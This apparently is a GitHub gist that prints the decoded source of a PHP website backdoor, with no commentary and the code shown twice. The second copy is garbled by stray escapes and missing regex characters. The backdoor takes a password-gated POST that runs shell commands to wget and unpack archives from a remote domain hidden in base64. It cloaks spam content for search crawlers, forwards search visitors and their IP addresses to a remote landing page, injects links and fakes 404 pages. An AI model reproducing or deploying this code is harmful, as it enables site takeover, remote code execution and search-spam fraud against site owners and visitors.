michalsen/gist:5dd52a9c50ed8e7b3d218a50797df513

## gistfile1.txt
print (base64_decode("set_time_limit(0);

function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec ($ch);
    curl_close($ch);
    return $result;
}

    $doorcontent="";
    $x=@$_POST["pppp_check"];
    $md5pass="e5e4570182820af0a183ce1520afe43b";

    $host=@$_SERVER["HTTP_HOST"];
    $uri=@$_SERVER["REQUEST_URI"];
    $host=str_replace("www.","",$host);
    $md5host=md5($host);
    $urx=$host.$uri;
    $md5urx=md5($urx);

    if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}

    $cdir=$tmppath."/.".$md5host."/";
    $domain=base64_decode("bWFnMWN3MHJsZC5jb20=");

    if ($x!=""){
      $p=md5(base64_decode(@$_POST["p"]));
      if ($p!=$md5pass)return;
      $pa=@$_POST["pa"];

      if (($x=="2")||($x=="4")){
        echo "###UPDATING_FILES###\n";
        if ($x=="2"){
          $cmd="cd $tmppath; rm -rf .$md5host";
          echo shell_exec($cmd);
        }
        $cmd="cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
        if ($pa!=""){
          $pa+=0;
          $cmd="cd $tmppath; wget http://update.$domain/arc/".$md5host."_".$pa.".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
        }
        echo shell_exec($cmd);
        exit;
      }
      if ($x=="3"){
        echo "###WORKED###\n";exit;
      }
    }else{
      $curx=$cdir.$md5urx;
      if (@file_exists($curx)){
        @list($IDpack,$mk,$doorcontent,$pdf,$contenttype)=@explode("|||",@file_get_contents($curx));
        $doorcontent=@base64_decode($doorcontent);

        $bot=0;
        $se=0;
        $mobile=0;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
        if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
        if ($bot) {
          $pdf+=0;
          if ($pdf==1){
            header("Content-Type: application/pdf");
          }
          if ($pdf==2){
            header("Content-Type: image/png");
          }
          if ($pdf==3){
            header("Content-Type: text/xml");
          }
          if ($pdf==4){
            $contenttype=@base64_decode($contenttype);
            $types=explode("\n",$contenttype);
            foreach($types as $val){
              $val=trim($val);
              if($val!="")header($val);
            }
          }
          echo $doorcontent;exit;
        }
        if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}

        header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
        echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n";
        echo '<html><head>' . "\n";
        echo '<title>404 Not Found</title>' . "\n";
        echo '</head><body>' . "\n";
        echo '<h1>Not Found</h1>' . "\n";
        echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n";
        echo '<hr>' . "\n";
        echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n";
        echo '</body></html>';
        exit;
      }else{


        $crurl="http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
        $buf=get_page_by_curl($crurl);

        $curx=$cdir."fff.sess";
        if (@file_exists($curx)){
          $links=@file($curx,FILE_SKIP_EMPTY_LINES|FILE_IGNORE_NEW_LINES);
          $c=@count($links)-1;
          shuffle($links);
          if ($c>20)$c=20;
          $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
          if(preg_match_all("/$regexp/siU", $buf, $matches)) {
            $zval=$matches[0];
            shuffle($zval);
            foreach($zval as $val){
              if ($c<0)break;
              list($l,$anchor)=explode("|||",trim($links[$c]));
              $new='<a href="'.$l.'">'.$anchor.'</a>';
              $buf=str_ireplace($val,$new,$buf);
              $c--;
            }
          }

        }
        echo $buf;

      }
    }
"));
	print (base64_decode("set_time_limit(0);

	function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
	$ch = curl_init ();
	curl_setopt ($ch, CURLOPT_URL,$url);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
	$result = curl_exec ($ch);
	curl_close($ch);
	return $result;
	}

	$doorcontent="";
	$x=@$_POST["pppp_check"];
	$md5pass="e5e4570182820af0a183ce1520afe43b";

	$host=@$_SERVER["HTTP_HOST"];
	$uri=@$_SERVER["REQUEST_URI"];
	$host=str_replace("www.","",$host);
	$md5host=md5($host);
	$urx=$host.$uri;
	$md5urx=md5($urx);

	if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}

	$cdir=$tmppath."/.".$md5host."/";
	$domain=base64_decode("bWFnMWN3MHJsZC5jb20=");

	if ($x!=""){
	$p=md5(base64_decode(@$_POST["p"]));
	if ($p!=$md5pass)return;
	$pa=@$_POST["pa"];

	if (($x=="2")\|\|($x=="4")){
	echo "###UPDATING_FILES###\n";
	if ($x=="2"){
	$cmd="cd $tmppath; rm -rf .$md5host";
	echo shell_exec($cmd);
	}
	$cmd="cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
	if ($pa!=""){
	$pa+=0;
	$cmd="cd $tmppath; wget http://update.$domain/arc/".$md5host."_".$pa.".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
	}
	echo shell_exec($cmd);
	exit;
	}
	if ($x=="3"){
	echo "###WORKED###\n";exit;
	}
	}else{
	$curx=$cdir.$md5urx;
	if (@file_exists($curx)){
	@list($IDpack,$mk,$doorcontent,$pdf,$contenttype)=@explode("\|\|\|",@file_get_contents($curx));
	$doorcontent=@base64_decode($doorcontent);

	$bot=0;
	$se=0;
	$mobile=0;
	if (preg_match("#google\|gsa-crawler\|AdsBot-Google\|Mediapartners\|Googlebot-Mobile\|spider\|bot\|yahoo\|google web preview\|mail\.ru\|crawler\|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
	if (preg_match("#android\|symbian\|iphone\|ipad\|series60\|mobile\|phone\|wap\|midp\|mobi\|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
	if (preg_match("#google\|bing\.com\|msn\.com\|ask\.com\|aol\.com\|altavista\|search\|yahoo\|conduit\.com\|charter\.net\|wow\.com\|mywebsearch\.com\|handycafe\.com\|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
	if ($bot) {
	$pdf+=0;
	if ($pdf==1){
	header("Content-Type: application/pdf");
	}
	if ($pdf==2){
	header("Content-Type: image/png");
	}
	if ($pdf==3){
	header("Content-Type: text/xml");
	}
	if ($pdf==4){
	$contenttype=@base64_decode($contenttype);
	$types=explode("\n",$contenttype);
	foreach($types as $val){
	$val=trim($val);
	if($val!="")header($val);
	}
	}
	echo $doorcontent;exit;
	}
	if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}

	header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
	echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n";
	echo '<html><head>' . "\n";
	echo '<title>404 Not Found</title>' . "\n";
	echo '</head><body>' . "\n";
	echo '<h1>Not Found</h1>' . "\n";
	echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n";
	echo '<hr>' . "\n";
	echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n";
	echo '</body></html>';
	exit;
	}else{


	$crurl="http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
	$buf=get_page_by_curl($crurl);

	$curx=$cdir."fff.sess";
	if (@file_exists($curx)){
	$links=@file($curx,FILE_SKIP_EMPTY_LINES\|FILE_IGNORE_NEW_LINES);
	$c=@count($links)-1;
	shuffle($links);
	if ($c>20)$c=20;
	$regexp = "<a\s[^>]href=(\"??)([^\" >]?)\\1[^>]>(.)<\/a>";
	if(preg_match_all("/$regexp/siU", $buf, $matches)) {
	$zval=$matches[0];
	shuffle($zval);
	foreach($zval as $val){
	if ($c<0)break;
	list($l,$anchor)=explode("\|\|\|",trim($links[$c]));
	$new='<a href="'.$l.'">'.$anchor.'</a>';
	$buf=str_ireplace($val,$new,$buf);
	$c--;
	}
	}

	}
	echo $buf;

	}
	}
	"));